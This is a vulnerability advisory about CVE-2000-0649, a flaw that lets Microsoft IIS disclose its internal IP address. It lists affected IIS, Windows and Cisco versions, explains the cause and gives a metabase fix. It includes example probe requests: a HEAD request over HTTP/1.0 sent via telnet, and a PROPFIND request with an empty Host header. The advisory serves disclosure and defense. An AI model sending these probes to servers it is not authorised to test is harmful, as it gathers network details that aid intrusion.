Microsoft IIS Internal IP Address Disclosure Vulnerability

Bugtraq ID:	1499
Class:	Design Error
CVE:	CVE-2000-0649
Remote:	Yes
Local:	No
Published:	Jul 13 2000 12:00AM
Updated:	Jul 11 2009 02:56AM
Credit:	Posted to NTBugtraq on July 13, 2000 by Dougal Campbell <[email protected]>.
Vulnerable:	Microsoft IIS 5.1 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server + Microsoft Windows XP 64-bit Edition SP1 + Microsoft Windows XP 64-bit Edition + Microsoft Windows XP 64-bit Edition - Microsoft Windows XP Home SP1 - Microsoft Windows XP Home SP1 - Microsoft Windows XP Home - Microsoft Windows XP Home + Microsoft Windows XP Professional SP1 + Microsoft Windows XP Professional SP1 + Microsoft Windows XP Professional + Microsoft Windows XP Professional Microsoft IIS 5.0 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP1 + Microsoft Windows 2000 Advanced Server + Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP1 + Microsoft Windows 2000 Professional + Microsoft Windows 2000 Professional - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server SP1 + Microsoft Windows 2000 Server + Microsoft Windows 2000 Server Microsoft IIS 4.0 alpha - Microsoft Windows NT 4.0 alpha - Microsoft Windows NT 4.0 alpha Microsoft IIS 4.0 + Cisco Building Broadband Service Manager (BBSM) 5.0 + Cisco Building Broadband Service Manager (BBSM) 5.0 + Cisco Call Manager 3.0 + Cisco Call Manager 3.0 + Cisco Call Manager 2.0 + Cisco Call Manager 2.0 + Cisco Call Manager 1.0 + Cisco Call Manager 1.0 + Cisco ICS 7750 + Cisco ICS 7750 + Cisco IP/VC 3540 Video Rate Matching Module + Cisco IP/VC 3540 Video Rate Matching Module + Cisco Unity Server 2.4 + Cisco Unity Server 2.4 + Cisco Unity Server 2.3 + Cisco Unity Server 2.3 + Cisco Unity Server 2.2 + Cisco Unity Server 2.2 + Cisco Unity Server 2.0 + Cisco Unity Server 2.0 + Cisco uOne 4.0 + Cisco uOne 4.0 + Cisco uOne 3.0 + Cisco uOne 3.0 + Cisco uOne 2.0 + Cisco uOne 2.0 + Cisco uOne 1.0 + Cisco uOne 1.0 + Hancom Hancom Office 2007 0 + Hancom Hancom Office 2007 0 + Microsoft BackOffice 4.5 + Microsoft BackOffice 4.5 + Microsoft Windows NT 4.0 Option Pack + Microsoft Windows NT 4.0 Option Pack Microsoft IIS 3.0 - Microsoft Windows NT 4.0 SP6a - Microsoft Windows NT 4.0 SP6a - Microsoft Windows NT 4.0 SP6 - Microsoft Windows NT 4.0 SP6 - Microsoft Windows NT 4.0 SP5 - Microsoft Windows NT 4.0 SP5 - Microsoft Windows NT 4.0 SP4 - Microsoft Windows NT 4.0 SP4 - Microsoft Windows NT 4.0 SP3 - Microsoft Windows NT 4.0 SP3 - Microsoft Windows NT 4.0 SP2 - Microsoft Windows NT 4.0 SP2 - Microsoft Windows NT 4.0 SP1 - Microsoft Windows NT 4.0 SP1 - Microsoft Windows NT 4.0 - Microsoft Windows NT 4.0 Microsoft IIS 2.0 + Microsoft Windows NT 4.0 + Microsoft Windows NT 4.0
Not Vulnerable:

Microsoft IIS Internal IP Address Disclosure Vulnerability

When a remote user attempts to access an area protected by basic authentication with no realm defined, while specifying HTTP 1.0, Microsoft IIS will return an Access Denied error message containing the internal IP address of the host. Even if IIS is behind a firewall or NAT, it will disclose the true internal IP address to the remote user.

The internal IP address may also be revealed through a HTTP request made with an empty host name. If a PROPFIND HTTP request is made, the message returned will include the IP address as part of the HREF header. The IP address may also be exposed through the WRITE or MKCOL methods, although they would not normally be exposed to the external network.

Eg.

telnet target 80
Trying target...
Connected to target.
Escape character is '^]'.
HEAD /directory HTTP/1.0[CRLF]
[CRLF]

HTTP/1.1 401 Access Denied
WWW-Authenticate: Basic realm="<Internal IP Address>"
Content-Length: 644
Content-Type: text/html

Microsoft IIS Internal IP Address Disclosure Vulnerability

HEAD /directory HTTP/1.0[CRLF]
[CRLF]

or

PROPFIND / HTTP/1.1
Host:
Content-Length: 0

Microsoft IIS Internal IP Address Disclosure Vulnerability

Solution:
This behaviour can be altered by changing the w3svc/UseHostName value in the metabase from False to True. Detailed instructions can be found in the Microsoft knowlege base at:

http://support.microsoft.com/support/kb/articles/Q218/1/80.ASP

Microsoft IIS Internal IP Address Disclosure Vulnerability

References:

• IIS4 Basic authentication realm issue (Dougal Campbell )
  
• Q218180: IIS Returns IP Address in HTTP Header (Content-Location) (Microsoft)